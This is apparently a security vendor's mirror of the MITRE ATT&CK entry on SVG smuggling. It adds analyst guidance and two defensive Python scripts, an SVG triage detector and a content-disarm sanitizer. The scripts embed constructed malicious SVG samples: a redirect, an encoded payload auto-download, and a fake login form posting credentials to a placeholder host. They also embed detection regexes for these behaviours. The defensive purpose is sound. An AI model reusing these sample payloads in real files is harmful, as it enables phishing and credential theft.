MITRE ATT&CK® Technique

T1027.017: SVG Smuggling

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.[1] SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `<script>` tags, which enable adversaries to embed malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files.

SVG smuggling can take a number of forms. For example, threat actors may include content that:

* Assembles malicious payloads[2]
* Downloads malicious payloads[3]
* Redirects users to malicious websites[4]
* Displays interactive content to users, such as fake login forms and download buttons.[4]

SVG Smuggling may be used in conjunction with HTML Smuggling where an SVG with a malicious payload is included inside an HTML file.[2] SVGs may also be included in other types of documents, such as PDFs.

Domain: Enterprise. ID: T1027.017. Type: Sub-technique. Object version: 2.0.
Glexia's Take

Analyst context for executives and security teams

Analyst confidence High

SVG Smuggling matters because it turns a file type many users and filters treat as an image into a delivery container for script-driven behavior, redirects, fake login prompts, or payload retrieval. For leaders, the practical risk is not “an image file” by itself; it is whether email, web, browser, endpoint, and user-reporting processes can recognize suspicious SVG behavior before it becomes credential theft, malware delivery, or incident response work.

Executive priority

Prioritize this as a control-validation issue across phishing resilience, content filtering, browser isolation, and SOC visibility. The supplied ATT&CK object places SVG Smuggling under the Defense Evasion tactic as a sub-technique of T1027 Obfuscated Files or Information, so the decision that matters is whether defenses inspect file content and runtime behavior rather than trusting the file extension or the user's perception of an image. Executives should ask whether SVG attachments, and SVGs embedded in HTML or PDFs, are inspected, sandboxed, logged, and escalated consistently enough to support incident decisions and audit evidence.

Technical view

ATT&CK lists Linux, macOS, and Windows platforms and notes that SVGs are XML-based files that can legitimately contain script tags. SOC and IR teams should validate visibility for SVG attachments, SVGs embedded in HTML or documents such as PDFs, script execution from SVG context, redirects to external sites, payload assembly or download behavior, and interactive phishing content such as fake login forms or download buttons. The related detection strategy DET0510 is specifically for SVG Smuggling with script execution and delivery behavior, so detection engineering should focus on behavior chains rather than static file naming alone.

Likely telemetry

  • Email security and mail gateway logs for SVG attachments, HTML files containing SVGs, and document attachments containing embedded SVG content
  • Web proxy, secure web gateway, DNS, and browser telemetry for redirects, external resource loads, and payload download attempts initiated after opening SVG content
  • Endpoint telemetry for browser or document-reader processes spawning unusual child processes, writing files, or initiating network connections after SVG interaction
  • File analysis or sandbox results that parse SVG/XML content and observe script behavior
  • User-reported phishing submissions and incident tickets involving image-like attachments, fake login forms, or unexpected download prompts

Detection direction

  • Validate that inspection parses SVG/XML content and does not trust the image file type or extension as benign.
  • Tune for combinations of SVG content with script tags, encoded or assembled payload content, redirect logic, download behavior, or credential-collection style interactive forms.
  • Correlate email delivery, browser execution, network redirects, and endpoint file/process activity to reduce false positives from legitimate SVG graphics that contain benign script or interactive elements.
  • Include relationship context with T1027 Obfuscated Files or Information: look for encoded, hidden, or assembled content in transit or on disk, not only known malicious indicators.
  • Use DET0510 as the ATT&CK-aligned detection reference, but verify local telemetry coverage because the ATT&CK object itself does not provide official detection text.
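The behaviours the technique description lists (script elements, payload assembly and download, redirects, fake forms) and the inspection points in the list above can be checked statically before a file ever reaches a browser. What follows is an added example written for this page, not code from MITRE, Glexia or any cited vendor: a Python triage function that parses an SVG as XML and returns the indicators it finds, run over constructed sample files. The indicator names, regexes and samples are the example's own choices, and production code should parse untrusted XML with defusedxml rather than xml.etree (an assumption about your stack).

```python
"""Static triage of SVG content for the behaviours T1027.017 describes.

Added example for this page, not MITRE's, Glexia's or any vendor's code. It
parses an SVG as XML and reports script elements, inline on* event handlers,
javascript: and non-image data: hrefs, HTML smuggled through <foreignObject>
(fake forms), large base64 blobs (payload assembly), and redirect or download
logic in script text. Sample SVGs are constructed. xml.etree is used for
portability; parse untrusted input with defusedxml in production (assumption).
"""
import re
import xml.etree.ElementTree as ET

# Script-text patterns keyed by the behaviour named in the technique description.
SCRIPT_PATTERNS = {
    "redirect": re.compile(
        r"(window\.|document\.)?location(\.href|\.replace|\.assign)?\s*[=(]"
        r"|window\.open\s*\(", re.I),
    "payload_assembly": re.compile(
        r"\batob\s*\(|fromCharCode|Uint8Array|new\s+Blob\s*\(", re.I),
    "payload_download": re.compile(
        r"createObjectURL|\.download\s*=|\bfetch\s*\(|XMLHttpRequest", re.I),
    "interactive_content": re.compile(
        r"document\.createElement\s*\(\s*['\"](form|input|iframe)", re.I),
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")  # 200+ base64 chars in a row
HTML_INTERACTIVE = {"form", "input", "iframe", "embed", "object"}

def local_name(name):
    """Strip the XML namespace so {svg}script and script compare equal."""
    return name.rsplit("}", 1)[-1].lower()

def triage_svg(svg_text):
    """Return the sorted list of smuggling indicators found in one SVG."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError:
        # Browsers render broken SVG leniently; a file the parser rejects still
        # needs a human look, so report it rather than silently pass it.
        return ["malformed_xml"]
    findings, script_text = set(), []
    for el in root.iter():
        name = local_name(el.tag)
        if name == "script":
            findings.add("script_element")
            script_text.append(el.text or "")
        elif name == "foreignobject":
            findings.add("foreignobject_html")
        elif name in HTML_INTERACTIVE:
            findings.add("interactive_content")
        if BASE64_BLOB.search(el.text or ""):
            findings.add("base64_blob")
        for attr, value in el.attrib.items():
            aname, v = local_name(attr), value.strip().lower()
            if aname.startswith("on"):  # onload, onclick, onmouseover, ...
                findings.add("event_handler")
                script_text.append(value)
            elif aname == "href" and v.startswith("javascript:"):
                findings.add("javascript_uri")
                script_text.append(value)
            elif aname == "href" and v.startswith("data:") and not v.startswith("data:image/"):
                findings.add("nonimage_data_uri")
    joined = "\n".join(script_text)
    for label, pattern in SCRIPT_PATTERNS.items():
        if pattern.search(joined):
            findings.add(label)
    return sorted(findings)

# Constructed samples: a benign animated icon and three smuggling shapes.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="teal">
    <animate attributeName="r" values="40;20;40" dur="2s" repeatCount="indefinite"/>
  </circle></svg>"""
REDIRECT_SVG = """<svg xmlns="http://www.w3.org/2000/svg">
  <script><![CDATA[ window.location.href = "https://example.invalid/login"; ]]></script>
</svg>"""
ASSEMBLY_SVG = """<svg xmlns="http://www.w3.org/2000/svg" onload="run()">
  <script><![CDATA[
    function run() {
      var b = "%s";  // encoded payload carried inside the image
      var bytes = Uint8Array.from(atob(b), function (c) { return c.charCodeAt(0); });
      var a = document.createElement("a");
      a.href = URL.createObjectURL(new Blob([bytes], { type: "application/zip" }));
      a.download = "invoice.zip";
      a.click();
    }
  ]]></script></svg>""" % ("QUJD" * 60)
LOGIN_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xhtml="http://www.w3.org/1999/xhtml" width="400" height="300">
  <foreignObject width="400" height="300">
    <xhtml:form action="https://example.invalid/collect" method="post">
      <xhtml:input name="user"/><xhtml:input name="pass" type="password"/>
    </xhtml:form></foreignObject></svg>"""

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN_SVG), ("redirect", REDIRECT_SVG),
                          ("assembly", ASSEMBLY_SVG), ("login", LOGIN_SVG)]:
        print(f"{label:9s} {triage_svg(sample)}")
```

Treat the result as triage input, not a verdict: legitimate SVGs with animation or benign script exist, which is why the detection direction above pairs file findings with browser, network and endpoint telemetry. The combinations are what matter: a base64 blob plus atob/Blob/createObjectURL in one file is the payload-assembly chain, location.href or window.open is the redirect, and a foreignObject wrapping form and input elements is the fake login prompt.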

Mitigation priorities

  • Apply application isolation and sandboxing, including browser sandboxing where appropriate, to contain active content opened from untrusted sources.
  • Harden email and web content controls to inspect or detonate SVG files, SVGs inside HTML, and SVGs embedded in document formats such as PDFs.
  • Restrict or warn on risky active content from untrusted attachments where business processes do not require it.
  • Strengthen phishing reporting and triage workflows so image-like attachments that produce login prompts, redirects, or downloads are investigated quickly.
  • Use incident response playbooks that preserve the original SVG, related HTML/PDF containers, email headers, network destinations, and endpoint activity for analysis.
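For the third bullet, restricting active content where the business does not need it, one concrete control is content disarm at the mail or web gateway: rebuild the SVG without the parts a smuggling payload depends on and log what was removed. The block below is an added example for this page, not MITRE's, Glexia's or any product's code; its removal policy is an assumption chosen for the example, the sample SVG is constructed, and production code should parse untrusted XML with defusedxml rather than xml.etree.

```python
"""Content disarm and reconstruction (CDR) for SVG attachments.

Added example for this page, not MITRE's, Glexia's or any vendor's code. It
strips the active content SVG smuggling depends on and keeps the drawing,
returning the rebuilt SVG plus a log of what was removed so a gateway can
record the decision. The policy is an assumption for the example: drop
<script>, <foreignObject> and SMIL <set> subtrees; drop on* event attributes;
drop href values using javascript: or non-image data: URIs; drop external
http(s) references on <image>/<use> (remote resource loads). The sample SVG is
constructed. Parse untrusted input with defusedxml in production (assumption).
"""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Emit the conventional prefixes instead of ElementTree's generated ns0/ns1 names.
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

ACTIVE_ELEMENTS = {"script", "foreignobject", "set"}
RESOURCE_ELEMENTS = {"image", "use"}

def local_name(name):
    """Strip the XML namespace so {svg}script and script compare equal."""
    return name.rsplit("}", 1)[-1].lower()

def _first_active(root):
    """Return (parent, child) for the first still-attached active element."""
    for parent in root.iter():
        for child in list(parent):
            if local_name(child.tag) in ACTIVE_ELEMENTS:
                return parent, child
    return None, None

def _unsafe_href(owner, value):
    """Classify an href value; None means it may stay."""
    v = value.strip().lower()
    if v.startswith("javascript:"):
        return "javascript_uri"
    if v.startswith("data:") and not v.startswith("data:image/"):
        return "nonimage_data_uri"
    if owner in RESOURCE_ELEMENTS and v.startswith(("http://", "https://", "//")):
        return "external_resource"
    return None

def sanitize_svg(svg_text):
    """Return (sanitized_svg, removed): the rebuilt document and a removal log."""
    root = ET.fromstring(svg_text)
    removed = []
    # Pass 1: detach whole subtrees that can execute or embed HTML. Rescanning
    # after each removal avoids double counting matches nested inside one.
    while True:
        parent, child = _first_active(root)
        if child is None:
            break
        parent.remove(child)
        removed.append("element:" + local_name(child.tag))
    # Pass 2: strip dangerous attributes from everything that remains.
    for el in root.iter():
        owner = local_name(el.tag)
        for attr in list(el.attrib):
            aname = local_name(attr)
            if aname.startswith("on"):
                del el.attrib[attr]
                removed.append("attribute:" + aname)
            elif aname == "href":
                reason = _unsafe_href(owner, el.attrib[attr])
                if reason:
                    del el.attrib[attr]
                    removed.append(reason + ":" + owner)
    return ET.tostring(root, encoding="unicode"), removed

# Constructed sample: one file carrying every smuggling shape the page lists.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     xmlns:xhtml="http://www.w3.org/1999/xhtml" width="300" height="200"
     onload="window.location.href='https://example.invalid/login'">
  <rect width="300" height="200" fill="#eee"/>
  <script><![CDATA[ document.title = "Invoice"; ]]></script>
  <foreignObject width="300" height="120">
    <xhtml:form action="https://example.invalid/collect" method="post">
      <xhtml:input name="user"/><xhtml:input name="pass" type="password"/>
    </xhtml:form>
  </foreignObject>
  <a xlink:href="javascript:alert(1)"><text x="20" y="180">Open document</text></a>
  <image xlink:href="https://example.invalid/track.png" width="1" height="1"/>
  <circle cx="150" cy="100" r="40" fill="teal"/>
</svg>"""

if __name__ == "__main__":
    cleaned, log = sanitize_svg(SAMPLE_SVG)
    print("\n".join("removed " + item for item in log))
    print(cleaned)
```

The policy deliberately keeps ordinary hyperlinks and SMIL animation; a stricter deployment would add "animate" to ACTIVE_ELEMENTS, since SMIL can rewrite an href at runtime, and rewrite or drop external links. Keep the original file next to the sanitized copy, as the incident response bullet above requires, so analysts can still see what the sender actually delivered.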

Analyst notes and limits

This technique is a sub-technique of T1027 Obfuscated Files or Information and sits under the Defense Evasion tactic. The most useful defensive framing is whether the organization can see through a benign-looking file presentation into script execution and delivery behavior. The relationship to M1048 (Application Isolation and Sandboxing) supports sandboxing and isolation as a mitigation direction; DET0510 supports behavior-focused detection validation.

The official ATT&CK object does not provide a detection section, and the supplied relationship context names DET0510 without detailed logic. Local conclusions require environment-specific evidence from mail, web, browser, endpoint, sandbox, and user-reporting systems. No attribution, active exploitation claim, customer exposure, or guaranteed detection coverage is implied by the supplied fields.

Official MITRE ATT&CK definition

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Related techniques

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

1 row

Domain | ID | Name | Relationship / procedure
Enterprise | T1027 | Obfuscated Files or Information | This object is a sub-technique of Obfuscated Files or Information.
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.

ATT&CK release: 19.1
Object version: 2.0
Created:
Modified:
Raw hash: b5e6a6ad825adad7...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | | 2.0 | | Current bundle | b5e6a6ad825a…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] Trustwave SVG Smuggling 2025. Bernard Bautista and Kevin Adriano. (2025, April 10). Pixel-Perfect Trap: The Surge of SVG-Borne Phishing Attacks. Retrieved April 14, 2025.
  2. [2] Talos SVG Smuggling 2022. Adam Katz and Jaeson Schultz. (2022, December 13). HTML smugglers turn to SVG images. Retrieved March 25, 2025.
  3. [3] Cofense SVG Smuggling 2024. Max Gannon. (2024, March 13). SVG Files Abused in Emerging Campaigns. Retrieved March 25, 2025.
  4. [4] Bleeping Computer SVG Smuggling 2024. Lawrence Abrams. (2024, November 17). Phishing emails increasingly use SVG attachments to evade detection. Retrieved March 25, 2025.
  5. [5] mitre-attack T1027.017.

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.